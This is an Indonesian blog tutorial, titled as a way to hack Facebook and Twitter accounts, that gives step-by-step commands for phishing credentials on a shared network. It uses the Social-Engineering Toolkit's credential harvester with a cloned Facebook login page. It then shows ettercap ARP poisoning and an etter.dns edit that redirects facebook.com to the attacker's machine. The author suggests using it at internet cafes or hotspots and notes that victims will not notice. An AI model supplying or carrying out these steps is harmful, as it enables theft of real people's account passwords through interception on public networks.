kali ini saya akan share tentang SET atau Social-Engineering Toolkit beserta Videonya ( dibawah )..
SET ini sudah tersedia di Backtrack 5 ...
ini sejenis fake login yang alamatnya adalah ip address kita...
jadi kebelet pngen ke warnet / hotspot hahaha..
oke mulai ....
Pertama buka terminal..
1. cd /pentest/exploits/set (enter)
2. ./set (enter)
3. pilih Social-Engineering Attacks dengan cara tekan angka 1
4. pilih Website Attack Vectors tekan 2
5. pilih Credential Harvester Attack Method tekan 3
6. pilih Web Templates tekan 1
jika
memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat
menjadi fake login, dan jika web templates kita tinggal memilih yang
sudah disediakan oleh SET itu sendiri, facebook contohnya...
7. tinggal pilih template yg mana, untuk contoh kita coba facebook, pilih 4
8. Press {return} to continue. tekan enter..
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
berarti SET sudah selesai....etss jangan di close.. :p nanti passwordnya muncul di bawah itu..
Bagaimana
SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau
http://192.168.0.3 misalnya maka tampilannya akan seperti facebook, dan
ketika korban login , akan terkirim ussername and password ke terminal
kita...( untuk melihat ip address , lakukan perintah ifconfig pada
terminal)
Tapi
sangat tipis kemungkinan korban mengakses http://192.168.0.3 , lalu
bagaimana agar korban dapat membuka http://192.168.0.3 / ip address kita
?? lakukan saja DNS SPOOFING...
oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.0.3.
korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...
1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :
facebook.com A 192.168.0.3
*.facebook.com A 192.168.0.3
192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah
ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // //
setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak :p
jika kurang mengerti lihat Video saya :
Hack Account Facebook Dan Twitter With Social-Engineering Toolkit
Oleh Unknown
Ditulis Oleh : Unknown ~ DosoGames
Anda sedang membaca artikel berjudul Hack Account Facebook Dan Twitter With Social-Engineering Toolkit yang ditulis oleh Cara Cara yang berisi tentang : Dan Maaf, Anda tidak diperbolehkan mengcopy paste artikel ini.
Jika Anda menyukai Artikel di blog ini, Silahkan berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Cara Cara
Widget by : M2T2
0 comments:
Post a Comment